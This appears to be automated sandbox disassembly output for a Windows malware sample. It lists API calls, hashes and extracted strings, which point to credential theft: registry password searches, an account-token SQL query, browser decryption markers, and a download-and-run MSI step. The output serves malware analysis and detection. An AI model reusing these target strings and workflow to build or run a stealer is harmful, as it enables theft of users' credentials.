                                                            • API ID: ExecuteShell$lstrcpy
                                                            • String ID: /i "$ /passive$"" $.dll$.msi$<
                                                            • API String ID: 2507796910-1961616256
                                                            • Opcode ID: 44e86c015a61c04fe20806be3985ddb56525c96478e7ec81701bd79708cec26e
                                                            • Instruction ID: c6cbf5cbd1186fff19da2d4ca96103fb293675039461b65d9a86aebdce78d3a9
                                                            • Opcode Fuzzy Hash: 44e86c015a61c04fe20806be3985ddb56525c96478e7ec81701bd79708cec26e
                                                            • Instruction Fuzzy Hash: 8E12EE71850108EAEB19FBA0DC96FEDB77CAF14300F504169F50666191EF786B4ACFA2
                                                            APIs
                                                            • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 007470DE
                                                              • Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788
                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,0074730D,007505BD), ref: 0074711C
                                                            • memset.MSVCRT ref: 0074716A
                                                            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 007472BE
                                                            Strings
                                                            • st, xrefs: 007472AE, 00747179, 0074717C
                                                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0074718C
                                                            • st, xrefs: 00747111
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: OpenProcesslstrcpymemset
                                                            • String ID: st$st$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                                            • API String ID: 224852652-2923598100
                                                            • Opcode ID: 34441cb5d8473500a3033b25224617599092edb757ffefe067028469426e59d1
                                                            • Instruction ID: 28922b56070a0dc454cbd1cfd3fa8d3930fe6cffeef29f95938f6a52ac25b8e7
                                                            • Opcode Fuzzy Hash: 34441cb5d8473500a3033b25224617599092edb757ffefe067028469426e59d1
                                                            • Instruction Fuzzy Hash: 86515FB0D44218DFDB28EBA0DC85BEEB774FF44305F1040A9E61566181EB786E88CF59
                                                            APIs
                                                              • Part of subcall function 007372D0: memset.MSVCRT ref: 00737314
                                                              • Part of subcall function 007372D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00737C90), ref: 0073733A
                                                              • Part of subcall function 007372D0: RegEnumValueA.ADVAPI32(00737C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 007373B1
                                                              • Part of subcall function 007372D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0073740D
                                                              • Part of subcall function 007372D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00737C90,80000001,007461C4,?,?,?,?,?,00737C90,?), ref: 00737452
                                                              • Part of subcall function 007372D0: HeapFree.KERNEL32(00000000,?,?,?,?,00737C90,80000001,007461C4,?,?,?,?,?,00737C90,?), ref: 00737459
                                                            • lstrcatA.KERNEL32(00000000,007517FC,00737C90,80000001,007461C4,?,?,?,?,?,00737C90,?,?,007461C4), ref: 00737606
                                                            • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 00737648
                                                            • lstrcatA.KERNEL32(00000000, : ), ref: 0073765A
                                                            • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0073768F
                                                            • lstrcatA.KERNEL32(00000000,00751804), ref: 007376A0
                                                            • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 007376D3
                                                            • lstrcatA.KERNEL32(00000000,00751808), ref: 007376ED
                                                            • task.LIBCPMTD ref: 007376FB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                                            • String ID: :
                                                            • API String ID: 3191641157-3653984579
                                                            • Opcode ID: 5a346d0cf6d7184c24aa54d88ee1bb2ae33b59da64284acf0ad0f36b57882717
                                                            • Instruction ID: 637ca05db81282946b3971db024c605b7d7ba86613af63d1a23dccc948e077f6
                                                            • Opcode Fuzzy Hash: 5a346d0cf6d7184c24aa54d88ee1bb2ae33b59da64284acf0ad0f36b57882717
                                                            • Instruction Fuzzy Hash: 273170B2914109DFDB48EBE4DC9ADFF7374BB84302F144018F116A7251DA38A986DB52
                                                            APIs
                                                            • memset.MSVCRT ref: 00737314
                                                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00737C90), ref: 0073733A
                                                            • RegEnumValueA.ADVAPI32(00737C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 007373B1
                                                            • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0073740D
                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00737C90,80000001,007461C4,?,?,?,?,?,00737C90,?), ref: 00737452
                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,00737C90,80000001,007461C4,?,?,?,?,?,00737C90,?), ref: 00737459
                                                              • Part of subcall function 00739240: vsprintf_s.MSVCRT ref: 0073925B
                                                            • task.LIBCPMTD ref: 00737555
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                                            • String ID: Password
                                                            • API String ID: 2698061284-3434357891
                                                            • Opcode ID: 413e39065461dec76fa8191de2b48f45787de4800376057c2484a26ee561d51a
                                                            • Instruction ID: 79868b0275d27ace5d0040a7ee3a94b14abcd6a36884db3dc826abf0bbebf4a1
                                                            • Opcode Fuzzy Hash: 413e39065461dec76fa8191de2b48f45787de4800376057c2484a26ee561d51a
                                                            • Instruction Fuzzy Hash: 3A6110B591426CDBDB24DB50CD45BDA77B8BF44300F0081D9E68966142DBB46FC9CF91
                                                            APIs
                                                            • lstrcatA.KERNEL32(?,00FCFFB8,?,00000104,?,00000104,?,00000104,?,00000104), ref: 007447DB
                                                              • Part of subcall function 00748DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00748E0B
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 00744801
                                                            • lstrcatA.KERNEL32(?,?), ref: 00744820
                                                            • lstrcatA.KERNEL32(?,?), ref: 00744834
                                                            • lstrcatA.KERNEL32(?,00FCB9C0), ref: 00744847
                                                            • lstrcatA.KERNEL32(?,?), ref: 0074485B
                                                            • lstrcatA.KERNEL32(?,00FD0830), ref: 0074486F
                                                              • Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788
                                                              • Part of subcall function 00748D90: GetFileAttributesA.KERNEL32(00000000,?,00740117,?,00000000,?,00000000,00750DAB,00750DAA), ref: 00748D9F
                                                              • Part of subcall function 00744570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00744580
                                                              • Part of subcall function 00744570: HeapAlloc.KERNEL32(00000000), ref: 00744587
                                                              • Part of subcall function 00744570: wsprintfA.USER32 ref: 007445A6
                                                              • Part of subcall function 00744570: FindFirstFileA.KERNEL32(?,?), ref: 007445BD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                            • String ID: 0at
                                                            • API String ID: 167551676-4037333825
                                                            • Opcode ID: eb12de01e0fe83d81c660951a26990e3f1cc3c39fd6a48c87a7a851939d0321e
                                                            • Instruction ID: e704296fa89582bc2d0f2ae376fc664767e9238103045ee42e71a67cd11a1e96
                                                            • Opcode Fuzzy Hash: eb12de01e0fe83d81c660951a26990e3f1cc3c39fd6a48c87a7a851939d0321e
                                                            • Instruction Fuzzy Hash: 123156B291020CA7DB54F7B0DC89EED737CAB98700F404589B31996081DF78ABC98B96
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00FD0558,00000000,?,00750E2C,00000000,?,00000000), ref: 00748130
                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00FD0558,00000000,?,00750E2C,00000000,?,00000000,00000000), ref: 00748137
                                                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00748158
                                                            • __aulldiv.LIBCMT ref: 00748172
                                                            • __aulldiv.LIBCMT ref: 00748180
                                                            • wsprintfA.USER32 ref: 007481AC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                                            • String ID: %d MB$@
                                                            • API String ID: 2886426298-3474575989
                                                            • Opcode ID: 8397b54f5e2d8f7cc9186925a1df9ad278d0ee4f5591a153642f03eb260803f5
                                                            • Instruction ID: 3509db1c7e13dfd780d87c3c59208bba0ac6c8abc4867e49412fb4d2646d1f79
                                                            • Opcode Fuzzy Hash: 8397b54f5e2d8f7cc9186925a1df9ad278d0ee4f5591a153642f03eb260803f5
                                                            • Instruction Fuzzy Hash: 7A211AB1E44218ABDB10DFD4CC49FAEB7B8FB44B14F104609F605BB280D77869018BA6
                                                            APIs
                                                              • Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788
                                                              • Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
                                                              • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                                                              • Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12
                                                              • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                                                              • Part of subcall function 0074A920: lstrcatA.KERNEL32(00000000), ref: 0074A982
                                                              • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905
                                                              • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                                                              • Part of subcall function 00739E10: memcmp.MSVCRT(?,v20,00000003), ref: 00739E2D
                                                            • lstrlenA.KERNEL32(00000000), ref: 0073BC9F
                                                              • Part of subcall function 00748E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00748E52
                                                            • StrStrA.SHLWAPI(00000000,AccountId), ref: 0073BCCD
                                                            • lstrlenA.KERNEL32(00000000), ref: 0073BDA5
                                                            • lstrlenA.KERNEL32(00000000), ref: 0073BDB9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                                            • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                                            • API String ID: 1440504306-1079375795
                                                            • Opcode ID: f047c114306b4b10b4caf362bb257520b9a846f8dc16ec795a91066668befae4
                                                            • Instruction ID: 22de9ddf7d3a2d86cb0eedfe227bfa362d8bac257b2625bb61d0492c312892d4
                                                            • Opcode Fuzzy Hash: f047c114306b4b10b4caf362bb257520b9a846f8dc16ec795a91066668befae4
                                                            • Instruction Fuzzy Hash: 10B14572950108FBEB05FBA0DD5AEEE737CEF54305F404568F506A6092EF386A49CB62
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExitProcess$DefaultLangUser
                                                            • String ID: u
                                                            • API String ID: 1494266314-1051851173
                                                            • Opcode ID: c842f045d6caf00ce626804cb5671d4477f231b9ea87c1a5eacac519b331a16b
                                                            • Instruction ID: 766011eda18ac218e44758ca9c852521d05883c34d97e248a023f7ae1c6a92d3
                                                            • Opcode Fuzzy Hash: c842f045d6caf00ce626804cb5671d4477f231b9ea87c1a5eacac519b331a16b
                                                            • Instruction Fuzzy Hash: 82F05E32D18209EFD3489FE0E909B6C7B70FB45703F040199E60D86290E6784B82AB97
                                                            APIs
                                                            • memcmp.MSVCRT(?,v20,00000003), ref: 00739E2D
                                                              • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                                                              • Part of subcall function 00740A60: memset.MSVCRT ref: 00740C1C
                                                              • Part of subcall function 00740A60: lstrcatA.KERNEL32(?,00000000), ref: 00740C35
                                                              • Part of subcall function 00740A60: lstrcatA.KERNEL32(?,00750D7C), ref: 00740C47
                                                              • Part of subcall function 00740A60: lstrcatA.KERNEL32(?,00000000), ref: 00740C5D
                                                              • Part of subcall function 00740A60: lstrcatA.KERNEL32(?,00750D80), ref: 00740C6F
                                                              • Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788
                                                            • memcmp.MSVCRT(?,v10,00000003), ref: 00739EAF
                                                            • memset.MSVCRT ref: 00739EE8
                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 00739F41
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                                            • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                                            • API String ID: 1977917189-1096346117
                                                            • Opcode ID: 14f3ed69013b62ab3e8c97c603280a5c21a57642e027ca3b2e2f215f2d6c7f12
                                                            • Instruction ID: 62071d32c35c2be1cddfa461ad0fac633cdb3b63978426da87dd40596f07870d
                                                            • Opcode Fuzzy Hash: 14f3ed69013b62ab3e8c97c603280a5c21a57642e027ca3b2e2f215f2d6c7f12
                                                            • Instruction Fuzzy Hash: 54610371A50248EFEB24EFA4CD9AFDD7775AF44304F408118F90A5F192EB786A05CB91
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00734FCA
                                                            • HeapAlloc.KERNEL32(00000000), ref: 00734FD1
                                                            • InternetOpenA.WININET(00750DDF,00000000,00000000,00000000,00000000), ref: 00734FEA
                                                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00735011
                                                            • InternetReadFile.WININET(00745EDB,?,00000400,00000000), ref: 00735041
                                                            • memcpy.MSVCRT(00000000,?,00000001), ref: 0073508A
                                                            • InternetCloseHandle.WININET(00745EDB), ref: 007350B9
                                                            • InternetCloseHandle.WININET(?), ref: 007350C6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
                                                            • String ID:
                                                            • API String ID: 3894370878-0
                                                            • Opcode ID: 00b997251828c56276a9898d4ff18dd1bd81677ca147f28806a50af2cbabebe3
                                                            • Instruction ID: 1298cbd1971de1cd8e7185e7dbb602d233b2979e5a2c1c53a0e76c12fbadf813
                                                            • Opcode Fuzzy Hash: 00b997251828c56276a9898d4ff18dd1bd81677ca147f28806a50af2cbabebe3
                                                            • Instruction Fuzzy Hash: 0F3127B5A04218EBDB24CF54DC85BDCB7B8FB48704F1081D8FA09A7281C7746AC59F99
                                                            APIs
                                                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00748426
                                                            • wsprintfA.USER32 ref: 00748459
                                                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0074847B
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0074848C
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00748499
                                                              • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                                                            • RegQueryValueExA.ADVAPI32(00000000,00FD04B0,00000000,000F003F,?,00000400), ref: 007484EC
                                                            • lstrlenA.KERNEL32(?), ref: 00748501
                                                            • RegQueryValueExA.ADVAPI32(00000000,00FD0468,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00750B34), ref: 00748599
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00748608
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0074861A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                                            • String ID: %s\%s
                                                            • API String ID: 3896182533-4073750446
                                                            • Opcode ID: 583362e13d09cdfc368c59a5e43f3a595cc6197c76508fb149c039408e57bb50
                                                            • Instruction ID: f766363f94364dc84da2182a5c14098b638e5003671648d5861049bacdc99fa6
